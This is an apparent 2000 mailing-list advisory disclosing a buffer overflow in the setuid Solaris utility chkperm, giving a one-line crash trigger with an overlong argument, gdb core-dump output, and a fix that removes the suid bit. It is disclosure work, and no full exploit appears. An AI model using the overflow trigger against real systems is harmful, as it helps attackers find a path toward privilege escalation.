[Hackerslab bug_paper] Solaris chkperm buffer overflow
Date: Thu, 6 Jan 2000 04:36:18 +0900
From: "╠Х©Каь KimYongJun (99а╧╬В)" <[email protected]>
To: [email protected]
Subject: [Hackerslab bug_paper] Solaris chkperm buffer overflow
[Hackerslab bug_paper] Solaris chkperm buffer overflow
File : /usr/vmsys/bin/chkperm
SYSTEM : Solaris 2.x
INFO :
We all know that /usr/vmsys/bin/chkperm contains a mountain of known bugs.
Here's one more that I found; The "Buffer Overflow" vulnerability.
The problem occurs when it gets the argument.
It accepts the argument without checking out its length, and this causes the problem.
It seems that this vulnerability also applies to Solaris 7, the latest version.
[Hackerslab:/users/loveyou/buf]$ chkperm -n `perl -e 'print "x" x 200'`
Segmentation fault (core dumped)
[hackerslab:/users/loveyou/buf]$ gdb chkperm core
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (sparc-sun-solaris2.5.1),
Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)...
Core was generated by `./chkperm -n xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxx'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/platform/SUNW,Ultra-Enterprise/lib/libc_psr.so.1...
(no debugging symbols found)...done.
#0 0xef73ea68 in nvmatch ()
How to fix - Quick Reference
--------------------------
it is recommended that the suid bit is
removed from chkperm using command :
chmod 400 /usr/vmsys/bin/chkperm
- Yong jun Kim -
e - mail : [email protected] , [email protected]
homepage : http://www.securesoft.co.kr , http://www.hackerslab.org
bye~ :)
